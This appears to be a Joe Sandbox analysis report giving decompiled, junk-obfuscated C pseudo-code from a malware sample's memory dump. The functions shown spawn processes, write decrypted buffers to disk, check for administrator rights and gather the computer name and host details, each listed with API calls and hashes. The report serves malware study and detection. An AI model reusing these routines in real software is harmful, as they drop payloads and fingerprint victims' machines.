Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: CloseFileHandle_memset$CreateRead
String ID:
API String ID: 222164253-0
Opcode ID: fced519606032e2c8f40e9325d66c8559a3b80e00bcaa820ece7c3ce0a1c443f
Instruction ID: 84f42137632ccf1409fc185b8e001f856d43ab02794d909a590ec720048d53e3
Opcode Fuzzy Hash: fced519606032e2c8f40e9325d66c8559a3b80e00bcaa820ece7c3ce0a1c443f
Instruction Fuzzy Hash: 9FA1BFB4D0060CEBDB04DF60FC946ED7B74FF8A310F15849AE881A22A4DB3556A4EF55

Uniqueness

Uniqueness Score: -1.00%

Function 00F66260 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00F66260(long long __fp0, CHAR* _a4, CHAR* _a8) {
				intOrPtr _v8;
				long long _v12;
				struct _PROCESS_INFORMATION _v28;
				struct _STARTUPINFOA _v96;
				int _t24;
				intOrPtr _t28;

				 *0xfae018 = ( *0xfae018 & 0x0000ffff) - 0x696ad4c0;
				_t28 =  *0xfae38c; // 0x93fc1fed
				_v8 = _t28 - 0x3d50a8bd;
				asm("fild dword [ebp-0x4]");
				_v12 = __fp0;
				_v28.hProcess = 0;
				_v28.hThread = 0;
				_v28.dwProcessId = 0;
				_v28.dwThreadId = 0;
				 *0xfae468 =  *0xfae468 + _v12;
				E00F7C990( &_v96, 0, 0x44);
				_v96.wShowWindow = 1;
				_v96.cb = 0x44;
				_v96.dwFlags = 1;
				_t24 = CreateProcessA(_a4, _a8, 0, 0, 0, 8, 0, 0,  &_v96,  &_v28); // executed
				if(_t24 != 0) {
					CloseHandle(_v28.hThread);
					return CloseHandle(_v28);
				}
				return _t24;
			}

0x00f66272
0x00f66278
0x00f66284
0x00f6628b
0x00f66293
0x00f6629c
0x00f662a2
0x00f662a5
0x00f662a8
0x00f662ab
0x00f662b1
0x00f662d3
0x00f662de
0x00f662e5
0x00f662ec
0x00f662f4
0x00f662fa
0x00000000
0x00f66304
0x00f6630d

APIs

_memset.LIBCMT ref: 00F662B1
CreateProcessA.KERNELBASE(?,00000008,00000000,00000000,00000000,00000008,00000000,00000000,?,0000159F), ref: 00F662EC
CloseHandle.KERNEL32(0000001F), ref: 00F662FA
CloseHandle.KERNEL32(0000159F), ref: 00F66304

Strings

D, xrefs: 00F662DE

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: CloseHandle$CreateProcess_memset
String ID: D
API String ID: 3113380336-2746444292
Opcode ID: be7ba6c2fae88e42e46f1fcf46bf14b148e74e0beb9ba644fe7f7b0d8421e147
Instruction ID: 354a330c0fdedf98801c5d287f0118757458d78b96b603f50554541fd19a9e61
Opcode Fuzzy Hash: be7ba6c2fae88e42e46f1fcf46bf14b148e74e0beb9ba644fe7f7b0d8421e147
Instruction Fuzzy Hash: AB11FEB5D0030DAFDB04DFE4DC85BAEBB74FB48700F108119EA18AB294D7706645DB95

Uniqueness

Uniqueness Score: -1.00%

Function 00F6A9D0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 169
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00F6A9D0(intOrPtr _a4, long _a8, CHAR* _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				void* _v16;
				long _v20;
				long long _v28;
				void _v20508;
				signed char _t31;
				signed char _t32;
				void* _t36;
				long _t39;
				intOrPtr _t42;
				intOrPtr _t52;
				intOrPtr _t58;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t77;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t82;
				signed int _t84;
				signed int _t85;
				long _t86;
				void* _t87;
				void* _t88;
				long long _t105;

				E00F7CCA0(0x5018);
				_t31 =  *0xfae294; // 0x3b89
				_t60 =  *0xfae288; // 0xec5403bf
				_t32 = _t31;
				_v12 =  *0xfa7820 -  *0xfae354;
				_v16 = _t60 + _t32;
				_t85 = _t84 | 0xffffffff;
				asm("fild dword [ebp-0xc]");
				 *0xfae288 =  *0xfae288 + _t85;
				asm("fcomp qword [ebp-0x8]");
				asm("fnstsw ax");
				_t97 =  *0xfae354;
				asm("fld1");
				asm("fsubp st1, st0");
				if((_t32 & 0x00000001) != 0) {
					_v12 =  *0xfae438;
					_t97 =  *0xfae3c8 * _v12;
					 *0xfae438 =  *0xfae3c8 * _v12;
				} else {
					 *0xfae598 = 0xffffc37b;
				}
				_t62 =  *0xfb0284; // 0x490
				 *0xfae060 = 0x675d;
				E00F6F090(_t97, _t62);
				_t88 = _t87 + 4;
				if( *0xfafc2c == 0) {
					_t36 = CreateFileA(_a12, 0x40000000, 0, 0, 2, 0, 0); // executed
					_v12 =  *0xfae60c;
					_v16 = _t36;
					_v12 =  *0xfae560 + _v12;
					 *0xfae2e8 =  *0xfae2e8 * _v12;
					_t105 =  *0xfae60c;
					asm("fld1");
					asm("fsubp st1, st0");
					 *0xfae60c = _t105;
					if(_t36 != _t85) {
						_t72 =  *0xfae5d8; // 0x39ee
						_t63 =  *0xfae550; // 0x1dabba5e
						_t58 = _a4;
						 *0xfae180 = _t63 + _t72;
						 *0xfae5d8 =  *0xfae5d8 + _t85;
						_t86 = _a8;
						_t82 = _a16;
						do {
							if(_t86 >= 0x5000) {
								_t105 =  *0xfae300;
								asm("fsubr qword [0xfa7818]");
								 *0xfae180 = E00F7CABC();
								_t39 = 0x5000;
							} else {
								_t39 = _t86;
							}
							_v20 = _t39;
							E00F7C200( &_v20508, _t58, _t39);
							_t42 = E00F71B00(_t105,  &_v20508, 0x1400, _t82);
							 *0xfae3ec =  *0xfae3ec + 0x91f8c49f;
							_t88 = _t88 + 0x18;
							_t82 = _t42;
							WriteFile(_v16,  &_v20508, _v20,  &_v20, 0);
							_t75 =  *0xfae140; // 0x9d1c
							_v8 = _t75;
							_t86 = _t86 - 0x5000;
							asm("fild dword [ebp-0x4]");
							_t58 = _t58 + 0x5000;
							_v12 = _t105;
							 *0xfae5b8 =  *0xfae5b8 * _v12;
							 *0xfae010 =  *0xfae010 - 1;
							_t105 =  *0xfae518;
							_t67 =  *0xfae010; // 0x21a8
							_v28 = _t105;
							_v8 = 0x7a54e45a - _t67;
							asm("fild dword [ebp-0x4]");
							asm("fsubr qword [ebp-0x18]");
							 *0xfae518 = _t105;
						} while (_t86 > 0);
						FindCloseChangeNotification(_v16);
						_t77 =  *0xfb0284; // 0x490
						E00F6D240(_t105, _t77);
						return 1;
					} else {
						_t69 =  *0xfb0284; // 0x490
						E00F6D240(_t105, _t69);
						_t78 =  *0xfae38c; // 0x93fc1fed
						_t52 =  *0xfae0e0; // 0xd349f564
						_t70 =  *0xfae530; // 0xe1aaad3d
						 *0xfae0e0 = _t70 + _t52 - _t78;
						return 0;
					}
				} else {
					_t79 =  *0xfb0284; // 0x490
					E00F6D240(_t97, _t79);
					return 0;
				}
			}

0x00f6a9d8
0x00f6a9e9
0x00f6a9ef
0x00f6a9f5
0x00f6a9f6
0x00f6a9fb
0x00f6a9ff
0x00f6aa02
0x00f6aa05
0x00f6aa0b
0x00f6aa0e
0x00f6aa10
0x00f6aa16
0x00f6aa18
0x00f6aa23
0x00f6aa39
0x00f6aa42
0x00f6aa45
0x00f6aa25
0x00f6aa2a
0x00f6aa2a
0x00f6aa4b
0x00f6aa57
0x00f6aa5d
0x00f6aa62
0x00f6aa6c
0x00f6aa97
0x00f6aaa3
0x00f6aaa6
0x00f6aab2
0x00f6aabe
0x00f6aac4
0x00f6aaca
0x00f6aacc
0x00f6aace
0x00f6aad6
0x00f6ab09
0x00f6ab10
0x00f6ab1c
0x00f6ab1f
0x00f6ab26
0x00f6ab2d
0x00f6ab31
0x00f6ab34
0x00f6ab3a
0x00f6ab40
0x00f6ab46
0x00f6ab51
0x00f6ab57
0x00f6ab3c
0x00f6ab3c
0x00f6ab3c
0x00f6ab65
0x00f6ab68
0x00f6ab7a
0x00f6ab7f
0x00f6ab8c
0x00f6ab98
0x00f6aba3
0x00f6aba9
0x00f6abb3
0x00f6abbb
0x00f6abc1
0x00f6abc4
0x00f6abca
0x00f6abd6
0x00f6abdc
0x00f6abe3
0x00f6abe9
0x00f6abf3
0x00f6abf8
0x00f6abfb
0x00f6abfe
0x00f6ac01
0x00f6ac07
0x00f6ac13
0x00f6ac19
0x00f6ac20
0x00f6ac33
0x00f6aad8
0x00f6aad8
0x00f6aadf
0x00f6aae4
0x00f6aaea
0x00f6aaef
0x00f6aafc
0x00f6ab08
0x00f6ab08
0x00f6aa6e
0x00f6aa6e
0x00f6aa75
0x00f6aa83
0x00f6aa83

APIs

CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,181DD011,?,00000000), ref: 00F6AA97
WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 00F6ABA3
FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,00000000,00000000,?,00000000), ref: 00F6AC13

Part of subcall function 00F6D240: ReleaseMutex.KERNEL32(?,?,?), ref: 00F6D267

Strings

ZTz, xrefs: 00F6ABB6

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: File$ChangeCloseCreateFindMutexNotificationReleaseWrite
String ID: ZTz
API String ID: 4274231522-1355016641
Opcode ID: 236708669d2d18d7d981987822c74a7edf732752abbefdc334720fa3ca7a4be8
Instruction ID: 3ccd4700f889dd2df0280308b16366d51444717f4fbd5d5068753ac0b3dc652e
Opcode Fuzzy Hash: 236708669d2d18d7d981987822c74a7edf732752abbefdc334720fa3ca7a4be8
Instruction Fuzzy Hash: 6E51E3B5E0060CDBDB00DFA4FC94BAE7BB8FB45310F148559E845A32A0EB345964EF86

Uniqueness

Uniqueness Score: -1.00%

Function 00F76710 Relevance: 4.6, APIs: 3, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E00F76710(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _v12;
				intOrPtr _v16;
				long long _v20;
				char _v48;
				char _v508;
				intOrPtr _t29;
				void* _t32;
				void* _t33;
				void* _t35;
				void* _t38;
				short _t46;
				void* _t50;
				void* _t54;
				void* _t56;
				signed int _t58;
				void* _t69;
				signed int _t70;
				short _t71;
				void* _t77;
				void* _t82;
				void* _t84;
				void* _t85;
				void* _t86;
				void* _t96;
				signed int _t104;
				signed int _t106;

				_t96 = __eflags;
				asm("fsubr qword [0xfa7ec8]");
				_v20 =  *0xfae3c8;
				_t29 =  *0xfae038; // 0x80000000
				_v16 = _t29;
				_v12 =  *0xfae088 + _v20;
				asm("fild dword [ebp-0xc]");
				 *0xfae038 = E00F7CABC();
				_t104 =  *0xfae3c8 -  *0xfa75c8;
				 *0xfae3c8 = _t104;
				E00F69630( &_v48);
				_t32 = E00F76330(_t96,  &_v508);
				if(_t32 != 0) {
					 *((char*)(_t86 + _t32 - 0x1f8)) = 0;
					_t33 = E00F6CF90(__eflags, _t104, 0x1453, 4);
					_t54 = _t33;
					_push(__esi);
					_t69 = _t54;
					_push(__edi);
					do {
						_t50 =  *_t54;
						_t54 = _t54 + 1;
						__eflags = _t50;
					} while (_t50 != 0);
					_t84 = _t69;
					_t70 = _t54 - _t69;
					_t77 =  &_v508 - 1;
					__eflags = _t77;
					do {
						_t56 =  *(_t77 + 1);
						_t77 = _t77 + 1;
						__eflags = _t56;
					} while (_t56 != 0);
					_t106 =  *0xfae1d8 -  *0xfa7ec0;
					_t58 = _t70 >> 2;
					memcpy(_t77, _t84, _t58 << 2);
					_v12 = _t106;
					_t71 =  *0xfae48c; // 0x47fe
					_t35 = memcpy(_t84 + _t58 + _t58, _t84, _t70 & 0x00000003);
					_v16 = _t71;
					asm("fild dword [ebp-0xc]");
					_v12 = _t106 + _v12;
					 *0xfae2d0 =  *0xfae2d0 * _v12;
					 *0xfae48c =  *0xfae48c - 1;
					E00F76570(4, _t35);
					_t38 = E00F6BC40( &_v508,  &_v48, 0x181dd011); // executed
					_pop(_t82);
					_pop(_t85);
					_push(0x1cc);
					_push(0);
					__eflags = _t38;
					if(_t38 == 0) {
						_push( &_v508);
						E00F7C990();
						E00F73030( &_v48, _t82, _t85);
						return 1;
					} else {
						_push( &_v508);
						E00F7C990();
						E00F73030( &_v48, _t82, _t85);
						__eflags = 0;
						return 0;
					}
				} else {
					E00F7C990( &_v508, _t32, 0x1cc);
					_t46 =  *0xfae5d0; // 0x2b98
					_v16 = _t46;
					asm("fild dword [ebp-0xc]");
					_v12 = _t104;
					 *0xfae068 =  *0xfae068 + _v12;
					 *0xfae5d0 =  *0xfae5d0 - 1;
					E00F73030( &_v48, __edi, __esi);
					return 0;
				}
			}

0x00f76710
0x00f7671f
0x00f76725
0x00f7672e
0x00f76736
0x00f76739
0x00f7673c
0x00f76747
0x00f76752
0x00f7675b
0x00f76761
0x00f7676d
0x00f76777
0x00f767cb
0x00f767d3
0x00f767dc
0x00f767de
0x00f767df
0x00f767e1
0x00f767e2
0x00f767e2
0x00f767e4
0x00f767e5
0x00f767e5
0x00f767f1
0x00f767f3
0x00f767f5
0x00f767f5
0x00f767f6
0x00f767f6
0x00f767f9
0x00f767fa
0x00f767fa
0x00f76806
0x00f7680c
0x00f7680f
0x00f76811
0x00f76816
0x00f76820
0x00f76825
0x00f7682b
0x00f76831
0x00f7683d
0x00f76843
0x00f7684a
0x00f7685f
0x00f76867
0x00f76868
0x00f7686a
0x00f7686f
0x00f76871
0x00f76873
0x00f76898
0x00f76899
0x00f768a4
0x00f768b1
0x00f76875
0x00f7687b
0x00f7687c
0x00f76887
0x00f7688c
0x00f76891
0x00f76891
0x00f76779
0x00f76786
0x00f7678b
0x00f76794
0x00f7679d
0x00f767a0
0x00f767ac
0x00f767b2
0x00f767b9
0x00f767c3
0x00f767c3

APIs

_memset.LIBCMT ref: 00F76786
_memset.LIBCMT ref: 00F7687C

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: f019ab59797da9f9478e7517e684ac52d6a00b5cd414788a21346be9366c7b42
Instruction ID: 4a3a234b72258b7e7eb5902d6f3c041681475f0a0fd804ab9705207f60936aa4
Opcode Fuzzy Hash: f019ab59797da9f9478e7517e684ac52d6a00b5cd414788a21346be9366c7b42
Instruction Fuzzy Hash: 614125B1D00A0D97DB04AF64FC51AFEBB74FB99304F00C0E9D859A2191EF715A68E792

Uniqueness

Uniqueness Score: -1.00%

Function 00F71CA0 Relevance: 4.6, APIs: 3, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 52%

			E00F71CA0() {
				long _v8;
				void* _v12;
				intOrPtr _v16;
				long long _v20;
				short _v24;
				struct _SID_IDENTIFIER_AUTHORITY _v28;
				intOrPtr _t14;
				int _t15;
				void* _t17;
				long long _t28;

				_t28 =  *0xfae1b0 +  *0xfa75c8;
				 *0xfae1b0 = _t28;
				_t14 =  *0xfae0c0; // 0x5f5af227
				_v16 = _t14;
				asm("fild dword [ebp-0xc]");
				_v20 = _t28;
				 *0xfae518 =  *0xfae1b0 + _v20 -  *0xfa7858;
				 *0xfae0c0 =  *0xfae0c0 + 1;
				_v28.Value = 0;
				_v24 = 0x500;
				 *0xfae174 =  *0xfae174 + 0xaa81dba0;
				_t15 = AllocateAndInitializeSid( &_v28, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				_v8 = _t15;
				if(_t15 != 0) {
					_t17 =  *0xfb02ec(0, _v12,  &_v8); // executed
					if(_t17 == 0) {
						_v8 = 0;
					}
					FreeSid(_v12);
					return _v8;
				}
				return _t15;
			}

0x00f71cad
0x00f71cb9
0x00f71cbf
0x00f71cc6
0x00f71cc9
0x00f71ccf
0x00f71cef
0x00f71cf5
0x00f71cfb
0x00f71cfe
0x00f71d04
0x00f71d0e
0x00f71d14
0x00f71d19
0x00f71d24
0x00f71d2c
0x00f71d2e
0x00f71d2e
0x00f71d35
0x00000000
0x00f71d3b
0x00f71d42

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00F71D0E
CheckTokenMembership.KERNELBASE(00000000,?,00F65323), ref: 00F71D24
FreeSid.ADVAPI32(?), ref: 00F71D35

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: d878f0da1924c8f812e10c76c7266ae4746ea861defdd34dc9726b197253db28
Instruction ID: b5ee490021c3532382c8375b5f6ae631632ea234082402bcf3985ac8c7ab7dc4
Opcode Fuzzy Hash: d878f0da1924c8f812e10c76c7266ae4746ea861defdd34dc9726b197253db28
Instruction Fuzzy Hash: 1E110AF590020DEFDB009FE5ECC89BEBB78FB09300F508559E501A2150DA305A08EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F75410 Relevance: 3.3, APIs: 2, Instructions: 348
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00F75410(void* __edi, void* __esi, void* __eflags, long long __fp0) {
				signed char _v8;
				long long _v12;
				signed int _v20;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				long _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v116;
				char _v356;
				char _v372;
				char _v592;
				char _v864;
				signed char _t90;
				void* _t95;
				int _t97;
				intOrPtr* _t98;
				char _t102;
				void* _t103;
				unsigned int _t104;
				signed char _t108;
				intOrPtr* _t111;
				intOrPtr _t113;
				intOrPtr _t118;
				signed char _t131;
				short _t134;
				signed char _t137;
				void* _t147;
				signed char _t155;
				intOrPtr* _t157;
				intOrPtr* _t163;
				char _t167;
				void _t168;
				void _t169;
				signed int _t171;
				char _t177;
				intOrPtr _t180;
				intOrPtr _t185;
				intOrPtr _t194;
				short _t195;
				signed char _t198;
				intOrPtr _t210;
				intOrPtr _t213;
				intOrPtr _t215;
				intOrPtr* _t218;
				void* _t220;
				char _t222;
				intOrPtr* _t225;
				intOrPtr _t226;
				intOrPtr _t227;
				short _t228;
				intOrPtr _t235;
				char _t236;
				void* _t237;
				void* _t239;
				void* _t244;
				void* _t245;
				void* _t247;
				void* _t248;
				void* _t249;
				void* _t250;
				void* _t252;
				void* _t254;
				void* _t255;
				void* _t256;
				void* _t257;
				void* _t267;
				void* _t268;
				signed int _t290;
				signed long long _t303;
				long long _t308;

				_t268 = __eflags;
				_t245 = __esi;
				_t237 = __edi;
				_t90 =  *0xfae4c4; // 0xe7e2
				_v8 = _t90;
				asm("fild dword [ebp-0x4]");
				_v12 = __fp0;
				asm("fsubr qword [ebp-0x8]");
				 *0xfae4c4 = E00F7CABC();
				E00F75380( &_v116, __edi);
				 *0xfae478 = E00F7CABC();
				_t289 =  *0xfae5fc;
				asm("fld1");
				asm("faddp st1, st0");
				E00F69630( &_v48);
				_push(0x24);
				_t95 = E00F7D76C(_t220, __edi, __esi, _t268);
				_t257 = _t256 + 4;
				if(_t95 == 0) {
					 *0xfafc34 = 0;
				} else {
					 *0xfafc34 = E00F65EA0(_t95, __edi);
				}
				_push(_t245);
				_v68 = 0x10;
				_t97 = GetComputerNameA( &_v64,  &_v68); // executed
				_t270 = _t97;
				if(_t97 != 0) {
					L7:
					_t98 = E00F6CF90(_t271, _t289, 0x2c03, 0x7e);
					_t163 = _t98;
					_t247 =  &_v372 - _t98;
					do {
						_t222 =  *_t163;
						 *((char*)(_t247 + _t163)) = _t222;
						_t163 = _t163 + 1;
						_t273 = _t222;
					} while (_t222 != 0);
					E00F76570(0x7e, _t98);
					E00F78260( &_v48, _t289,  &_v356);
					E00F64A10( &_v48, _t273, _t289, 9);
					_t102 = 0;
					do {
						_t167 =  *((intOrPtr*)(_t255 + _t102 - 0x160));
						 *((char*)(_t255 + _t102 - 0x35c)) = _t167;
						_t102 = _t102 + 1;
					} while (_t167 != 0);
					_t103 =  &_v64;
					 *0xfae360 = 0x94800000;
					 *0xfae364 = 0xc1d0330d;
					_t248 = _t103;
					do {
						_t168 =  *_t103;
						_t103 = _t103 + 1;
					} while (_t168 != 0);
					_push(_t237);
					_t104 = _t103 - _t248;
					_t239 =  &_v864 - 1;
					do {
						_t169 =  *(_t239 + 1);
						_t239 = _t239 + 1;
					} while (_t169 != 0);
					_t171 = _t104 >> 2;
					memcpy(_t248 + _t171 + _t171, _t248, memcpy(_t239, _t248, _t171 << 2) & 0x00000003);
					E00F7C990( &_v372, 0, 0x100);
					_t290 =  *0xfae190;
					asm("fld1");
					asm("fsubp st1, st0");
					 *0xfae190 = _t290;
					_t108 =  *0xfae55c; // 0x4f0f
					_v8 = _t108;
					asm("fild dword [ebp-0x4]");
					_v20 = _t290;
					_v12 =  *0xfae190;
					asm("fsubr qword [ebp-0x8]");
					_t293 =  *0xfae3f8 -  *0xfa80b0;
					asm("fsubr qword [ebp-0x10]");
					 *0xfae55c = E00F7CABC(); // executed
					E00F723B0( *0xfae3f8 -  *0xfa80b0,  &_v88);
					_t225 =  *0xfafc74; // 0x27311b0
					_t111 = _t225;
					_t28 = _t111 + 1; // 0x27311b1
					_t249 = _t28;
					_pop(_t244);
					do {
						_t177 =  *_t111;
						_t111 = _t111 + 1;
						_t280 = _t177;
					} while (_t177 != 0);
					_t250 = _t111 - _t249;
					 *((char*)(_t225 + _t250 - 1)) = _t177;
					_t113 =  *0xfafc74; // 0x27311b0
					E00F64780( &_v48, _t113);
					E00F64A10( &_v48, _t280, _t293, 9);
					_t180 =  *0xfafc74; // 0x27311b0
					 *((char*)(_t180 + _t250 - 1)) = 0x5c;
					_t226 =  *0xfb050c; // 0x2731058
					E00F64780( &_v48, _t226);
					E00F64A10( &_v48, _t280, _t293, 9);
					_t118 =  *0xfb04b0; // 0x2731180
					E00F64780( &_v48, _t118);
					E00F64A10( &_v48, _t280, _t293, 9);
					_t185 =  *0xfb04b8; // 0x2731100
					E00F64780( &_v48, _t185);
					E00F64A10( &_v48, _t280, _t293, 9);
					_t227 =  *0xfb04f8; // 0x2731140
					E00F64780( &_v48, _t227);
					E00F64A10( &_v48, _t280, _t293, 9);
					E00F64780( &_v48, E00F6CF90(_t280, _t293, 0x39f9, 4));
					E00F76570(4, _t125);
					E00F64A10( &_v48, _t280, _t293, 9);
					E00F64780( &_v48,  &_v64);
					_v20 =  *0xfae260;
					 *0xfae5f0 =  *0xfae5f0 * _v20;
					asm("fld1");
					asm("faddp st1, st0");
					_t131 = E00F64A10( &_v48, _t280,  *0xfae260, 9);
					_pop(_t252);
					asm("fucompp");
					asm("fnstsw ax");
					_t301 =  *0xfae4d8 +  *0xfa75c8;
					 *0xfae4d8 =  *0xfae4d8 +  *0xfa75c8;
					_t281 = _t131 & 0x00000044;
					if((_t131 & 0x00000044) != 0) {
						 *0xfae040 =  *0xfae040 + 1;
						_t228 =  *0xfae59c; // 0x3ef2
						_t194 =  *0xfae040; // 0xe6acfb4
						_t195 = _t194 + _t228;
						__eflags = _t195;
						 *0xfae59c = _t195;
					} else {
						_t215 =  *0xfae140; // 0x9d1c
						_t235 =  *0xfae49c; // 0x3b0d
						 *0xfae0cc = _t235 - _t215;
					}
					E00F64780( &_v48,  &_v88);
					_t134 =  *0xfae28c; // 0x0
					 *0xfae0c8 = _t134;
					E00F64A10( &_v48, _t281, _t301, 9);
					_t198 =  *0xfae598; // 0x0
					_t303 =  *0xfae1b0 -  *0xfa80a0;
					_v8 = _t198;
					_v20 = _t303;
					asm("fild dword [ebp-0x4]");
					 *0xfae598 = E00F7CABC();
					_t137 =  *0xfae3ec; // 0x94572d35
					_v8 = _t137;
					asm("fild dword [ebp-0x4]");
					_v20 = _t303 * _v20;
					_v20 =  *0xfae130 + _v20;
					asm("fsubr qword [ebp-0x10]");
					_t308 =  *0xfa8098;
					asm("fcompp");
					asm("fnstsw ax");
					if((_t137 & 0x00000041) == 0) {
						 *0xfae5a8 =  *0xfae5a8 + 1;
						_t213 =  *0xfae5a8; // 0x0
						_t283 = _t213 + 0xe680b6c - 0x836587ef;
						if(_t213 + 0xe680b6c < 0x836587ef) {
							_t155 =  *0xfae16c; // 0x93ae
							_v8 = _t155;
							asm("fild dword [ebp-0x4]");
							 *0xfae030 = _t308;
						} else {
							 *0xfae3b0 = 0xcd338d1a;
						}
					}
					E00F651A0( &_v592, _t308);
					E00F64780( &_v48, E00F7A790( &_v592,  &_v864));
					E00F66370( &_v592);
					E00F6A070(E00F71FC0(E00F6CEE0( &_v116),  &_v48), _t144, _t143, 1,  &_v116);
					E00F6CB90( &_v48, _t283);
					_t147 = E00F6FFA0( &_v116);
					E00F70A30( &_v48, L00F75200( &_v116), _t147);
					E00F79D60( &_v116);
					_t210 =  *0xfafc34; // 0x2731230
					E00F6B5D0(_t210,  &_v48); // executed
					_v64 = 0;
					_v60 = 0;
					_v56 = 0;
					_v52 = 0;
					_v88 = 0;
					_v84 = 0;
					_v80 = 0;
					_v76 = 0;
					_v72 = 0;
					 *0xfae1e0 =  *0xfa8094 -  *0xfae5fc;
					E00F73030( &_v48, _t244, _t252);
					return E00F79F50();
				} else {
					_t157 = E00F6CF90(_t270, _t289, 0x3038, 0xe);
					_t267 = _t257 + 8;
					_t218 = _t157;
					_t254 =  &_v64 - _t157;
					do {
						_t236 =  *_t218;
						 *((char*)(_t254 + _t218)) = _t236;
						_t218 = _t218 + 1;
						_t271 = _t236;
					} while (_t236 != 0);
					E00F76570(0xe, _t157);
					_t257 = _t267 + 8;
					goto L7;
				}
			}

0x00f75410
0x00f75410
0x00f75410
0x00f75419
0x00f75422
0x00f75425
0x00f75428
0x00f75431
0x00f75439
0x00f75442
0x00f75458
0x00f7545d
0x00f75463
0x00f75468
0x00f75470
0x00f75475
0x00f75477
0x00f7547c
0x00f75481
0x00f75491
0x00f75483
0x00f7548a
0x00f7548a
0x00f7549b
0x00f754a4
0x00f754ab
0x00f754b1
0x00f754b3
0x00f754e5
0x00f754ec
0x00f754fa
0x00f754fc
0x00f75500
0x00f75500
0x00f75502
0x00f75505
0x00f75506
0x00f75506
0x00f7550d
0x00f7551f
0x00f75529
0x00f7552e
0x00f75530
0x00f75530
0x00f75537
0x00f7553e
0x00f7553f
0x00f75543
0x00f75546
0x00f75550
0x00f7555a
0x00f75560
0x00f75560
0x00f75562
0x00f75563
0x00f75567
0x00f7556e
0x00f75570
0x00f75571
0x00f75571
0x00f75574
0x00f75575
0x00f7557b
0x00f75593
0x00f75595
0x00f7559a
0x00f755a0
0x00f755a2
0x00f755a4
0x00f755aa
0x00f755b3
0x00f755b6
0x00f755b9
0x00f755c2
0x00f755cb
0x00f755ce
0x00f755d4
0x00f755e0
0x00f755e6
0x00f755eb
0x00f755f4
0x00f755f6
0x00f755f6
0x00f755f9
0x00f75600
0x00f75600
0x00f75602
0x00f75603
0x00f75603
0x00f75609
0x00f7560b
0x00f7560f
0x00f75618
0x00f75622
0x00f75627
0x00f7562d
0x00f75632
0x00f7563c
